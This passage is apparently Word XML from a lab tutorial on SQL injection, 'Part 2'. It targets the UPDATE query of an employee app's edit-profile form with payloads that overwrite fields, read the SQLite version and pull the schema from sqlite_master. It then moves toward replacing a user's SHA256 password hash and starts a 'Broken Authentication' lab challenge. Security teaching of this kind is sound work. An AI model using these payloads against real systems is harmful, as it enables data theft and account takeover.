          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8317798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79829"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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction to SQL Injection: Part 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>If a SQL injection occurs on an UPDATE statement, the damage can be much more severe as it allows one to change records within the database. In the employee management application, there is an edit profile page as depicted in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17306192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19264"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To confirm that the form is vulnerable and that we have working column names, we can try to inject something similar to the code below into the nickName and email field:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>asd',nickName='test',email='hacked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4709104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10471"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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Injecting the line with "sqlite_version()" into the nickName field shows that we are dealing with SQLite and that the version number is 3.27.2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1691147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4724"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21418007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00717"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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>By injecting the code above, we can see that the table in the database is called "usertable" and “secrets”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20186776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77644"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="853208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0855"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rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then continue by extract all the column names from the usertable: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9895347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34775"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1345053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5355"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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After having dumped the data from the database, we can see that the password is hashed. This means that we will need to identify the correct hash type used if we want to update the password for a user. Using a hash identifier such as hash-identifier, we can identify the hash as SHA256:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">There are multiple ways of generating a sha256 hash. For example, we can use </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://gchq.github.io/CyberChef/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://gchq.github.io/CyberChef/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3699017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01783"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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16322944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94495"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2811216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21676"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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerable Startup: Broken Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4766135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13572"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ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">From the landing page on </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.10.30.46:5000/" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://10.10.30.46:5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, go to Broken Authentication under Track: Vulnerable Startup (</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.10.30.46:5000/challenge1/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
